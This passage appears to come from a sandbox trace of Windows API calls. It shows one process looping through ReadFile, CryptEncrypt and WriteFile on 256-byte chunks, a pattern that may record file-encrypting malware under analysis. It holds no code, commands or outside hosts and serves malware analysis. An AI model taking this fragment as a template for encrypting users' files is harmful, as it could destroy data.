hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.617] GetLastError () returned 0x0 [0149.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.617] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.617] GetLastError () returned 0x0 [0149.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.618] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.618] GetLastError () returned 0x0 [0149.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.618] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.618] GetLastError () returned 0x0 [0149.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.618] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.618] GetLastError () returned 0x0 [0149.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.618] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.618] GetLastError () returned 0x0 [0149.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.618] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.618] GetLastError () returned 0x0 [0149.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.619] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.619] GetLastError () returned 0x0 [0149.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.619] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.619] GetLastError () returned 0x0 [0149.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.619] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.619] GetLastError () returned 0x0 [0149.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.619] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.619] GetLastError () returned 0x0 [0149.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.619] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.619] GetLastError () returned 0x0 [0149.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.619] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.619] GetLastError () returned 0x0 [0149.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.619] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.620] GetLastError () returned 0x0 [0149.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.620] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.620] GetLastError () returned 0x0 [0149.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.620] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.620] GetLastError () returned 0x0 [0149.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.620] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.620] GetLastError () returned 0x0 [0149.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.620] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.620] GetLastError () returned 0x0 [0149.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.620] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.620] GetLastError () returned 0x0 [0149.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.621] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.621] GetLastError () returned 0x0 [0149.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.621] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.621] GetLastError () returned 0x0 [0149.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.621] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.621] GetLastError () returned 0x0 [0149.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.621] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.621] GetLastError () returned 0x0 [0149.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.621] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.621] GetLastError () returned 0x0 [0149.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.621] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.621] GetLastError () returned 0x0 [0149.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.622] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.622] GetLastError () returned 0x0 [0149.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.622] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.622] GetLastError () returned 0x0 [0149.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.622] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.622] GetLastError () returned 0x0 [0149.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.622] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.622] GetLastError () returned 0x0 [0149.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.622] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.622] GetLastError () returned 0x0 [0149.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.622] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.622] GetLastError () returned 0x0 [0149.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.622] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.622] GetLastError () returned 0x0 [0149.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.623] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.623] 